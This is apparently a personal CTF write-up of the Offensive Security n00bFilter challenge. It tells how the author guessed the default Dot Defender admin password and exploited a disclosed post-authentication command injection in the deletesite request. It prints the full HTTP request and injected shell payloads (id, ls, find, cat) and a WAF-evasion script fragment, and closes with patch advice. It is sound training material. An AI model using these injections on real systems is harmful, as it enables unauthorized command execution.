Offensive Security n00bFilter Walk Through
How Strong is Your FU hacker challenge
Target 1: N00bFilter
The first target in this weekend’s offensive security challenge was nicknamed n00bfilter as it was used to weed out all the n00bs who would plague the internal Offsec networks with high bandwidth unnecessary tools such as Nessus or Webinspect hoping for an easy hit. Tools like these, while useful, are not going to directly aid you in exploitation of this CTF challenge. Your BRAIN is the only valid tool in an offsec challenge. At first glance n00bfilter appears to be a login and password prompt to an application with no other available options but username and password. Source looks pretty standard as well.. Nothing special, no JavaScript or includes to be had.
First Clue: Error Message
Like most pentests your first inclination would be to post a single quote or random character into the field and see if it errors out. After adding a single quote I was presented with a taunting answer of "HAHAHA" rather than the expected sql error or perhaps invalid character. Upon further inspection of the error pages source code it was noted that this was an Applicure error message. Applicure being the vendor of Dot Defender a well known Web Application Firewall (WAF). I found it interesting that a n00bfilter would be running an ids/ips product and started performing further probing of the application.
Annoyance: cool out periods
I then started trying default user/pass combinations such as admin/admin admin/password. Anything that a normal administrator would FAIL to implement changes to. This led me nowhere quickly at which time I started losing my connection to the application. After roughly 5minutes i was back online and figured my internet connection was foobarred... Got to love sketchy cable connections right?? I swear they do bandwidth limiting but whatever.. LOL A few minutes later I was blocked again, and again, and again.... Apparently Dot Defender was set to "Cool me down” when I got out of control.... Very NOT COOL..... This annoyed me becuase I was manually probing the application. This application also appeared to vary its cool outs based on what you were doing, messing with the URL, messing with the input fields, certain characters, some may be ok others blocked you immediately, then sometimes after a few tries... Interesting the application has a personality apparently.
Thought: Dot Defender bypass
When I started getting owned by dot defender over and over again I started to think maybe I have to shut the WAF down or at least add my IP address to a list of friends within the dot defenders configurations. But how??
I immediately started researching dot defender weaknesses and vulnerabilities on my good friend Google and this was found...
Full Disclosure:
http://seclists.org/fulldisclosure/2009/Nov/357The above link states that Post Authentication there is a vulnerability that allows an attacker to run commands on the operating system via the delete site method. Hmmm “post authentication”. This means I need credentials, bullocks!! I don't have credentials
Ok back to google, the google gods then provided me with a few tidbits of information regarding Dot Defender, one useful piece of information being that DotDefender site manager was located a /dotDefender. I browsed to this address and sure enough I was prompted with a basic authentication login prompt that told me its username was "Admin". Now I have a login name the struggle is half over right? so i tried all the default password combos and a few random passwords based on the site and the challenge.
FAIL
Dont Second Guess yourself:
Figuring that a vulnerability on full disclosure was not going to be the issue and especially being post auth on a n00bFilter I moved back to probing the app... I went at it for awhile with combination's of character encodings and character assembly that might fool the WAF into either letting my attacks through the firewall or removing just enough of the attack to reassemble the attack for me.. Attacks such as <scr><script>ipt> or other combination's using various
encoding techniques...
Again FAIL!!
Social Networking:
So I remember the hints said to stay in touch via twitter and IRC. I pop up the IRC channel and its a bunch of whiners complaining about a password being changed.. I was just thinking “WHAT PASSWORD”. I felt out of the loop at that point but I know better then to ask Muts a direct question, I already know the answer.. “TRY HARDER” this is offensive securities mantra which answers every inquiry. So instead I got some redbull and thought it over for a few and noticed that the IRC channel said the passwords were now reset to the original values.
Dot Defender again:
Knowing that the only password not behind dot defenders tyrannical rule was the basic auth login for dot defender, i decided gave Dot Defender a second go. The very first combination I tried popped open the application with the password of “password” and a # symbol at the end of the index page value, someone had suggested I try the # earlier.
Apparently the first few people past the login started changing the password to keep others from catching up to them.... Sneaky little terrorists threw me off my game. So now it was time to try my post authentication exploitation from full disclosure.. :)
Post Auth:
Opening up Burp Proxy a well known application proxy I started browsing the Dot Defender site manager. I was presented with a page that allowed me to add and DELETE sites. I created a fake test site and then set my proxy to capture a request. Once I captured a request I sent it over to a module in burp by the name of “repeater”, repeater allows you to keep making the request over and over again manually manipulating the values. Since I had an example delete request and I had the delete example on the full disclosure vulnerability, I modified my request with the vulnerable values.POST /dotDefender/index.cgi HTTP/1.1
Host: www1.noob-filter.com
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www1.noob-filter.com/dotDefender/index.cgi
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
sitename=testsite&deletesitename=testsite;id;ls -al;pwd;&action=deletesite&linenum=12
In the web response was the output of my command injection. I injected an “ls” command which in unix lists the contents of a directory. I thought to myself, ok so that’s cool but I need to find a certain file to show that I passed the challenge. Running burp requests looking for this file is waaaaay to tedious for me. So I used another familiar unix command. The “find” command.
sitename=testsite&deletesitename=testsite;id;find / -name 'n00bSecret.txt';pwd;&action=deletesite&linenum=12
Score:
The n00bSecret file was found quickly so I used the “cat” command to list out the contents of the file with the proof of passing the first challenge.Request:
sitename=testsite&deletesitename=testsite;id;cat /opt/0c2b7b8071ee658e1c957d3b024ff872d2/n00bSecret.txt;pwd;&action=deletesite&linenum=12Response:
9f9b0b7d2db411c10b517b547a8693d831d3aa936aba4d54b51d30b5a182c05b1f7a5759fd7d5ef64e5485e5d3e3a214dd6b4b78a733566556b2887a6b9a6299I browsed out to the contest scoreboard page and added in my shiny new proof key imediatly since I knew there was a 10 minute time limit between exploitation and acceptance. Accepted 25 points added to my account and a shiny new VPN login will be provided to me within 5 minutes time!!!
Mexican food:
At this point I decided it was time for some Mexican food, I was fiendish for some chips and salsa all day long. I passed the n00b challenge being the 30th contender out of a possible 100 slots. Note that the 100 slots were not filled till 24 hours after this point.. :) Not too horrible but again could be much better!!Lessons Learned:
Dont second guess your observations and research. I was thrown off the path because sneaky contestants were changing the scope of the competition. Observe every detail of the source and what you are presented with and try things more than once! They just might work the second time... At this point 5 hours of the competition were wasted on something that should have taken me less than 2 hours. Or even 30 min if I was quick with it.
Dot Defender Remediation:
There is a patch available for this vulnerability from Applicure, just patch your app!! Also according to this other post by Applicure it only effects Linux running Apache. Response by Applicure in the link below.
http://seclists.org/bugtraq/2009/Dec/123
Next up, how to own killthen00b